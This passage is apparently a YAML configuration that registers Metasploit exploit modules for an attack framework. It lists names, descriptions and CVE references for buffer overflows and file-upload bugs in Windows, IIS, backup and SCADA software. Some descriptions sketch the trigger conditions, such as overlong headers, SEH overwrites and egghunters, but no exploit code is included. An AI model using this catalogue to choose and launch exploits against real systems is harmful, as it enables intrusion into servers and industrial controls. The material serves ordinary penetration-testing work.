- - URL
- http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2
path: extensions/metasploit/
class: Msf_module
msf_adobe_robohelper_authbypass:
enable: true
msf: true
msf_key: windows/http/adobe_robohelper_authbypass
name: Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an authentication bypass vulnerability which\n\
\t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3068
- - OSVDB
- "57896"
- - URL
- http://www.intevydis.com/blog/?p=69
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-066
path: extensions/metasploit/
class: Msf_module
msf_minishare_get_overflow:
enable: true
msf: true
msf_key: windows/http/minishare_get_overflow
name: Minishare 1.4.1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a simple buffer overflow for the minishare web\n\
\t\t\t\tserver. This flaw affects all versions prior to 1.4.2. This\n\
\t\t\t\tis a plain stack buffer overflow that requires a \"jmp esp\" to reach\n\
\t\t\t\tthe payload, making this difficult to target many platforms\n\
\t\t\t\tat once. This module has been successfully tested against\n\
\t\t\t\t1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2004-2271
- - OSVDB
- "11530"
- - BID
- "11620"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovalarm_lang:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovalarm_lang
name: HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\
\t\t\t\tBy sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tThis specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n\
\t\t\t\tfunction within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n\
\t\t\t\tHTTP request that contains the following.\n\n\
\t\t\t\t1. An \"Accept-Language\" header longer than 100 bytes\n\
\t\t\t\t2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n\
\t\t\t\tThe vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n\
\t\t\t\tNOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.\n\
\t\t\t"
authors:
- - CVE
- 2009-4179
- - OSVDB
- "60930"
- - BID
- "37347"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-09-12
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877
path: extensions/metasploit/
class: Msf_module
msf_coldfusion_fckeditor:
enable: true
msf: true
msf_key: windows/http/coldfusion_fckeditor
name: ColdFusion 8.0.1 Arbitrary File Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n\
\t\t\t\tand Execute vulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-2265
- - OSVDB
- "55684"
path: extensions/metasploit/
class: Msf_module
msf_altn_securitygateway:
enable: true
msf: true
msf_key: windows/http/altn_securitygateway
name: Alt-N SecurityGateway username Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tAlt-N SecurityGateway is prone to a buffer overflow condition. This\n\
\t\t\t\tis due to insufficient bounds checking on the \"username\"\n\
\t\t\t\tparameter. Successful exploitation could result in code\n\
\t\t\t\texecution with SYSTEM level privileges.\n\n\
\t\t\t\tNOTE: This service doesn't restart, you'll only get one shot. However,\n\
\t\t\t\tit often survives a successful exploitation attempt.\n\
\t\t\t"
authors:
- - CVE
- 2008-4193
- - OSVDB
- "45854"
- - BID
- "29457"
path: extensions/metasploit/
class: Msf_module
msf_apache_mod_rewrite_ldap:
enable: true
msf: true
msf_key: windows/http/apache_mod_rewrite_ldap
name: Apache module mod_rewrite LDAP protocol Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the mod_rewrite LDAP protocol scheme handling\n\
\t\t\t\tflaw discovered by Mark Dowd, which produces an off-by-one overflow.\n\
\t\t\t\tApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n\
\t\t\t\tThis module requires REWRITEPATH to be set accurately. In addition,\n\
\t\t\t\tthe target must have 'RewriteEngine on' configured, with a specific\n\
\t\t\t\t'RewriteRule' condition enabled to allow for exploitation.\n\n\
\t\t\t\tThe flaw affects multiple platforms, however this module currently\n\
\t\t\t\tonly supports Windows based installations.\n\
\t\t\t"
authors:
- - CVE
- 2006-3747
- - OSVDB
- "27588"
- - BID
- "19204"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html
- - URL
- http://www.milw0rm.com/exploits/3680
- - URL
- http://www.milw0rm.com/exploits/3996
- - URL
- http://www.milw0rm.com/exploits/2237
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebhelp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebhelp
name: HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4178
- - OSVDB
- "60929"
- - BID
- "37340"
path: extensions/metasploit/
class: Msf_module
msf_kerio_auth:
enable: true
msf: true
msf_key: windows/firewall/kerio_auth
name: Kerio Firewall 2.1.4 Authentication Packet Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Kerio Personal Firewall\n\
\t\t\t\tadministration authentication process. This module has only been tested\n\
\t\t\t\tagainst Kerio Personal Firewall 2 (2.1.4).\n\
\t\t\t"
authors:
- - CVE
- 2003-0220
- - OSVDB
- "6294"
- - BID
- "7180"
- - URL
- http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10
path: extensions/metasploit/
class: Msf_module
msf_blackice_pam_icq:
enable: true
msf: true
msf_key: windows/firewall/blackice_pam_icq
name: ISS PAM.dll ICQ Parser Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ISS products that use\n\
\t\t\t\tthe iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n\
\t\t\t\twill result in arbitrary code execution as LocalSystem. This exploit\n\
\t\t\t\tonly requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n\
\t\t\t\taddress.\n\n\
\t\t\t\tThe ISS exception handler will recover the process after each overflow, giving\n\
\t\t\t\tus the ability to bruteforce the service and exploit it multiple times.\n\
\t\t\t"
authors:
- - CVE
- 2004-0362
- - OSVDB
- "4355"
- - URL
- http://www.eeye.com/html/Research/Advisories/AD20040318.html
- - URL
- http://xforce.iss.net/xforce/alerts/id/166
path: extensions/metasploit/
class: Msf_module
msf_energizer_duo_payload:
enable: true
msf: true
msf_key: windows/backdoor/energizer_duo_payload
name: Energizer DUO Trojan Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload against\n\
\t\t\t\tany system infected with the Arugizer trojan horse. This\n\
\t\t\t\tbackdoor was shipped with the software package accompanying\n\
\t\t\t\tthe Energizer Duo USB battery charger.\n\
\t\t\t"
authors:
- - CVE
- 2010-0103
- - OSVDB
- "62782"
- - US-CERT-VU
- "154421"
path: extensions/metasploit/
class: Msf_module
msf_ms07_029_msdns_zonename:
enable: true
msf: true
msf_key: windows/smb/ms07_029_msdns_zonename
name: Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\t\tof the Microsoft DNS service. The vulnerability is triggered\n\
\t\t\t\twhen a long zone name parameter is supplied that contains\n\
\t\t\t\tescaped octal strings. This module is capable of bypassing NX/DEP\n\
\t\t\t\tprotection on Windows 2003 SP1/SP2. This module exploits the\n\
\t\t\t\tRPC service using the \\DNSSERVER pipe available via SMB. This\n\
\t\t\t\tpipe requires a valid user account to access, so the SMBUSER\n\
\t\t\t\tand SMBPASS options must be specified.\n\
\t\t\t"
authors:
- - CVE
- 2007-1748
- - OSVDB
- "34100"
- - MSB
- MS07-029
- - URL
- http://www.microsoft.com/technet/security/advisory/935964.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms05_017_msmq:
enable: true
msf: true
msf_key: windows/dcerpc/ms05_017_msmq
name: Microsoft Message Queueing Service Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\t\tto the Microsoft Message Queueing service. The offset to the\n\
\t\t\t\treturn address changes based on the length of the system\n\
\t\t\t\thostname, so this must be provided via the 'HNAME' option.\n\
\t\t\t\tMuch thanks to snort.org and Jean-Baptiste Marchand's\n\
\t\t\t\texcellent MSRPC website.\n\n\
\t\t\t"
authors:
- - CVE
- 2005-0059
- - OSVDB
- "15458"
- - MSB
- MS05-017
- - BID
- "13112"
path: extensions/metasploit/
class: Msf_module
msf_ms07_065_msmq:
enable: true
msf: true
msf_key: windows/dcerpc/ms07_065_msmq
name: Microsoft Message Queueing Service DNS Name Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\tto the Microsoft Message Queueing service. This exploit requires\n\
\t\t\tthe target system to have been configured with a DNS name and\n\
\t\t\tfor that name to be supplied in the 'DNAME' option. This name does\n\
\t\t\tnot need to be served by a valid DNS server, only configured on\n\
\t\t\tthe target machine.\n\n\
\t\t\t"
authors:
- - CVE
- 2007-3039
- - OSVDB
- "39123"
- - MSB
- MS07-065
path: extensions/metasploit/
class: Msf_module
msf_ms03_026_dcom:
enable: true
msf: true
msf_key: windows/dcerpc/ms03_026_dcom
name: Microsoft RPC DCOM Interface Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the RPCSS service; this vulnerability\n\
\t\t\t\twas originally found by the Last Stage of Delirium research group and has been\n\
\t\t\t\twidely exploited ever since. This module can exploit the English versions of\n\
\t\t\t\tWindows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)\n\
\t\t\t"
authors:
- - CVE
- 2003-0352
- - OSVDB
- "2100"
- - MSB
- MS03-026
- - BID
- "8205"
path: extensions/metasploit/
class: Msf_module
msf_name_service:
enable: true
msf: true
msf_key: windows/backupexec/name_service
name: Veritas Backup Exec Name Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Veritas Backup\n\
\t\t\t\tExec Agent Browser service. This vulnerability occurs when a\n\
\t\t\t\trecv() call has a length value too long for the destination\n\
\t\t\t\tstack buffer. By sending an agent name value of 63 bytes or\n\
\t\t\t\tmore, we can overwrite the return address of the recv\n\
\t\t\t\tfunction. Since we only have ~60 bytes of contiguous space\n\
\t\t\t\tfor shellcode, a tiny findsock payload is sent which uses a\n\
\t\t\t\thardcoded IAT address for the recv() function. This payload\n\
\t\t\t\twill then roll the stack back to the beginning of the page,\n\
\t\t\t\trecv() the real shellcode into it, and jump to it. This\n\
\t\t\t\tmodule has been tested against Veritas 9.1 SP0, 9.1 SP1, and\n\
\t\t\t\t8.6.\n\
\t\t\t"
authors:
- - CVE
- 2004-1172
- - OSVDB
- "12418"
- - BID
- "11974"
- - URL
- http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_remote_agent:
enable: true
msf: true
msf_key: windows/backupexec/remote_agent
name: Veritas Backup Exec Windows Remote Agent Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Veritas\n\
\t\t\t\tBackupExec Windows Agent software. This vulnerability occurs\n\
\t\t\t\twhen a client authentication request is received with type\n\
\t\t\t\t'3' and a long password argument. Reliable execution is\n\
\t\t\t\tobtained by abusing the stack buffer overflow to smash a SEH\n\
\t\t\t\tpointer.\n\
\t\t\t"
authors:
- - CVE
- 2005-0773
- - OSVDB
- "17624"
- - BID
- "14022"
- - URL
- http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities
- - URL
- http://seer.support.veritas.com/docs/276604.htm
path: extensions/metasploit/
class: Msf_module
msf_w3who_query:
enable: true
msf: true
msf_key: windows/isapi/w3who_query
name: Microsoft IIS ISAPI w3who.dll Query String Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the w3who.dll ISAPI\n\
\t\t\t\tapplication. This vulnerability was discovered by Nicolas\n\
\t\t\t\tGregoire and this code has been successfully tested against\n\
\t\t\t\tWindows 2000 and Windows XP (SP2). When exploiting Windows\n\
\t\t\t\tXP, the payload must call RevertToSelf before it will be\n\
\t\t\t\table to spawn a command shell.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1134
- - OSVDB
- "12258"
- - URL
- http://www.exaprobe.com/labs/advisories/esa-2004-1206.html
- - BID
- "11820"
path: extensions/metasploit/
class: Msf_module
msf_rsa_webagent_redirect:
enable: true
msf: true
msf_key: windows/isapi/rsa_webagent_redirect
name: Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the SecurID Web\n\
\t\t\t\tAgent for IIS. This ISAPI filter runs in-process with\n\
\t\t\t\tinetinfo.exe; any attempt to exploit this flaw will result\n\
\t\t\t\tin the termination and potential restart of the IIS service.\n\n\
\t\t\t"
authors:
- - CVE
- 2005-4734
- - OSVDB
- "20151"
path: extensions/metasploit/
class: Msf_module
msf_ms03_022_nsiislog_post:
enable: true
msf: true
msf_key: windows/isapi/ms03_022_nsiislog_post
name: Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow found in the nsiislog.dll\n\
\t\t\t\tISAPI filter that comes with Windows Media Server. This\n\
\t\t\t\tmodule will also work against the 'patched' MS03-019\n\
\t\t\t\tversion. This vulnerability was addressed by MS03-022.\n\
\t\t\t"
authors:
- - CVE
- 2003-0349
- - OSVDB
- "4535"
- - BID
- "8035"
- - MSB
- MS03-022
- - URL
- http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html
path: extensions/metasploit/
class: Msf_module
msf_ms00_094_pbserver:
enable: true
msf: true
msf_key: windows/isapi/ms00_094_pbserver
name: Microsoft IIS Phone Book Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Phone Book Service /pbserver/pbserver.dll\n\
\t\t\t\tdescribed in MS00-094. By sending an overly long URL argument\n\
\t\t\t\tfor phone book updates, it is possible to overwrite the stack. This\n\
\t\t\t\tmodule has only been tested against Windows 2000 SP1.\n\
\t\t\t"
authors:
- - CVE
- 2000-1089
- - OSVDB
- "463"
- - BID
- "2048"
- - MSB
- MS00-094
path: extensions/metasploit/
class: Msf_module
msf_ms03_051_fp30reg_chunked:
enable: true
msf: true
msf_key: windows/isapi/ms03_051_fp30reg_chunked
name: Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the chunked encoding buffer overflow\n\
\t\t\t\tdescribed in MS03-051 and originally reported by Brett\n\
\t\t\t\tMoore. This particular module works against versions of\n\
\t\t\t\tWindows 2000 between SP0 and SP3. Service Pack 4 fixes the\n\
\t\t\t\tissue.\n\
\t\t\t"
authors:
- - CVE
- 2003-0822
- - OSVDB
- "2952"
- - BID
- "9007"
- - MSB
- MS03-051
path: extensions/metasploit/
class: Msf_module
msf_cam_log_security:
enable: true
msf: true
msf_key: windows/unicenter/cam_log_security
name: CA CAM log_security() Stack Buffer Overflow (Win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA CAM service\n\
\t\t\t\tby passing a long parameter to the log_security() function.\n\
\t\t\t\tThe CAM service is part of TNG Unicenter. This module has\n\
\t\t\t\tbeen tested on Unicenter v3.1.\n\
\t\t\t"
authors:
- - CVE
- 2005-2668
- - OSVDB
- "18916"
- - BID
- "14622"
path: extensions/metasploit/
class: Msf_module
msf_igss9_igssdataserver_listall:
enable: true
msf: true
msf_key: windows/scada/igss9_igssdataserver_listall
name: 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n\
\t\t\t\tIGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n\
\t\t\t\tfails to do proper bounds checking before copying data into a small buffer on the stack.\n\
\t\t\t\tThis causes a buffer overflow and allows overwriting a structured exception handling record\n\
\t\t\t\ton the stack, allowing for unauthenticated remote code execution. Also, after the payload\n\
\t\t\t\texits, IGSSdataServer.exe should automatically recover.\n\
\t\t\t"
authors:
- - CVE
- 2011-1567
- - OSVDB
- "72353"
- - URL
- http://aluigi.altervista.org/adv/igss_2-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_factorylink_vrn_09:
enable: true
msf: true
msf_key: windows/scada/factorylink_vrn_09
name: Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n\
\t\t\t\tand 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n\
\t\t\t\texecute arbitrary code due to the improper use of a vsprintf() function while\n\
\t\t\t\tprocessing the user-supplied text field. Originally found and posted by\n\
\t\t\t\tLuigi Auriemma.\n\
\t\t\t"
authors:
- - OSVDB
- "72815"
- - URL
- http://aluigi.altervista.org/adv/factorylink_4-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin:
enable: true
msf: true
msf_key: windows/scada/realwin
name: DATAC RealWin SCADA Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.0.10.37).\n\
\t\t\t\tBy sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4322
- - OSVDB
- "48606"
- - BID
- "31418"
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_initialize:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_initialize
name: DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68812"
- - CVE
- 2010-4142
- - URL
- http://aluigi.altervista.org/adv/realwin_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_iconics_genbroker:
enable: true
msf: true
msf_key: windows/scada/iconics_genbroker
name: Iconics GENESIS32 Integer overflow version 9.21.201.01
category: Metasploit
description: "\n\
\t\t\t\t\tThe GenBroker service on port 38080 is affected by three integer overflow\n\
\t\t\t\tvulnerabilities while handling opcode 0x4b0, which is caused by abusing\n\
\t\t\t\tthe memory allocations needed for the number of elements passed by the client.\n\
\t\t\t\tThis results in unexpected behaviors such as direct registry calls, memory location\n\
\t\t\t\tcalls, or arbitrary remote code execution. Please note that in order to ensure\n\
\t\t\t\treliability, this exploit will try to open calc (hidden), inject itself into the\n\
\t\t\t\tprocess, and then open up a shell session. Also, DEP bypass is supported.\n\
\t\t\t"
authors:
- - URL
- http://aluigi.org/adv/genesis_4-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_moxa_mdmtool:
enable: true
msf: true
msf_key: windows/scada/moxa_mdmtool
name: MOXA Device Manager Tool 2.1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n\
\t\t\t\tWhen sending a specially crafted MDMGw (MDM2_Gateway) response, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "69027"
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=
- - URL
- http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf
path: extensions/metasploit/
class: Msf_module
msf_iconics_webhmi_setactivexguid:
enable: true
msf: true
msf_key: windows/scada/iconics_webhmi_setactivexguid
name: ICONICS WebHMI ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n\
\t\t\t\tBy supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n\
\t\t\t\tfails to do any proper bounds checking before this input is copied onto the stack,\n\
\t\t\t\twhich causes a buffer overflow, and results in arbitrary code execution under the context\n\
\t\t\t\tof the user.\n\
\t\t\t"
authors:
- - OSVDB
- "72135"
- - URL
- http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf
- - URL
- http://www.exploit-db.com/exploits/17240/
path: extensions/metasploit/
class: Msf_module
msf_igss9_igssdataserver_rename:
enable: true
msf: true
msf_key: windows/scada/igss9_igssdataserver_rename
name: 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n\
\t\t\t\ta long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n\
\t\t\t\ta buffer overflow condition occurs in IGSSdataServer.exe while handling an RMS report,\n\
\t\t\t\twhich results in arbitrary code execution under the context of the user.\n\n\
\t\t\t\tThe attack is carried out in three stages. The first stage sends the final payload to\n\
\t\t\t\tIGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n\
\t\t\t\tso the process can find a valid ID for the Rename command. The last stage then triggers\n\
\t\t\t\tthe vulnerability with the Rename command, and uses an egghunter to search for the\n\
\t\t\t\tshellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n\
\t\t\t\tthe small buffer size, which cannot even contain our ROP chain and the final payload.\n\
\t\t\t"
authors:
- - CVE
- 2011-1567
- - OSVDB
- "72352"
- - URL
- http://aluigi.altervista.org/adv/igss_5-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin_on_fc_binfile_a:
enable: true
msf: true
msf_key: windows/scada/realwin_on_fc_binfile_a
name: DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in DATAC Control International RealWin\n\
\t\t\t\tSCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n\
\t\t\t\tpacket via port 910, RealWin will try to create a file (which would be saved to\n\
\t\t\t\tC:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n\
\t\t\t\tsupplied filename with an inline memcpy routine without proper bounds checking, which\n\
\t\t\t\tresults in a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n\
\t\t\t\tTested version: 2.0 (Build 6.1.8.10)\n\
\t\t\t"
authors:
- - CVE
- 2011-1563
- - OSVDB
- "72826"
- - BID
- "46937"
- - URL
- http://aluigi.altervista.org/adv/realwin_5-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_igss9_misc:
enable: true
msf: true
msf_key: windows/scada/igss9_misc
name: 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n\
\t\t\t\tData Collector services. The initial approach is first by transferring our binary\n\
\t\t\t\twith Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n\
\t\t\t\tan EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n\
\t\t\t\tthat payload with a CreateProcessA() function as a new thread.\n\
\t\t\t"
authors:
- - OSVDB
- "72354"
- - OSVDB
- "72349"
- - URL
- http://aluigi.altervista.org/adv/igss_1-adv.txt
- - URL
- http://aluigi.altervista.org/adv/igss_8-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_factorylink_csservice:
enable: true
msf: true
msf_key: windows/scada/factorylink_csservice
name: Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found on Siemens FactoryLink 8. The\n\
\t\t\t\tvulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n\
\t\t\t\tthe user-supplied path first gets converted to ANSI format (CodePage 0), and then\n\
\t\t\t\tgets handled by a logging routine where proper bounds checking is not done,\n\
\t\t\t\ttherefore causing a stack-based buffer overflow, and results in arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "72812"
- - URL
- http://aluigi.altervista.org/adv/factorylink_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_winlog_runtime:
enable: true
msf: true
msf_key: windows/scada/winlog_runtime
name: Sielco Sistemi Winlog Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Sielco\n\
\t\t\t\tSistemi Winlog <= 2.07.00. When sending a specially formatted\n\
\t\t\t\tpacket to the Runtime.exe service, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-0517
- - OSVDB
- "70418"
- - URL
- http://aluigi.org/adv/winlog_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin_on_fcs_login:
enable: true
msf: true
msf_key: windows/scada/realwin_on_fcs_login
name: RealWin SCADA Server DATAC Login Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n\
\t\t\t\tearlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n\
\t\t\t\tpacket containing a long username, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-1563
- - OSVDB
- "72824"
- - URL
- http://aluigi.altervista.org/adv/realwin_2-adv.txt
- - URL
- http://www.dataconline.com/software/realwin.php
path: extensions/metasploit/
class: Msf_module
msf_citect_scada_odbc:
enable: true
msf: true
msf_key: windows/scada/citect_scada_odbc
name: CitectSCADA/CitectFacilities ODBC Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n\
\t\t\t\tThis has only been tested against Citect v5, v6 and v7.\n\
\t\t\t"
authors:
- - CVE
- 2008-2639
- - BID
- "29634"
- - OSVDB
- "46105"
- - URL
- http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability
- - URL
- http://www.auscert.org.au/render.html?it=9433
- - URL
- http://www.controsys.hu/anyagok/group_quality_assurance.pdf
- - URL
- http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_txtevent:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_txtevent
name: DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4142
- - OSVDB
- "68812"
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_initialize_rf:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_initialize_rf
name: DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68812"
- - CVE
- 2010-4142
- - URL
- http://aluigi.altervista.org/adv/realwin_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_timbuktu_fileupload:
enable: true
msf: true
msf_key: windows/motorola/timbuktu_fileupload
name: Timbuktu Pro Directory Traversal/File Upload
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a directory traversal vulnerability in Motorola's\n\
\t\t\t\tTimbuktu Pro for Windows 8.6.5.\n\
\t\t\t"
authors:
- - CVE
- 2008-1117
- - OSVDB
- "43544"
path: extensions/metasploit/
class: Msf_module
msf_ms04_031_netdde:
enable: true
msf: true
msf_key: windows/smb/ms04_031_netdde
name: Microsoft NetDDE Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetDDE service, which is the\n\
\t\t\t\tprecursor to the DCOM interface. This exploit affects only operating systems\n\
\t\t\t\treleased prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n\
\t\t\t\tthat this vulnerability can be exploited without authentication, the NDDEAPI\n\
\t\t\t\tpipe is only accessible after successful authentication.\n\
\t\t\t"
authors:
- - CVE
- 2004-0206
- - OSVDB
- "10689"
- - BID
- "11372"
- - MSB
- MS04-031
path: extensions/metasploit/
class: Msf_module
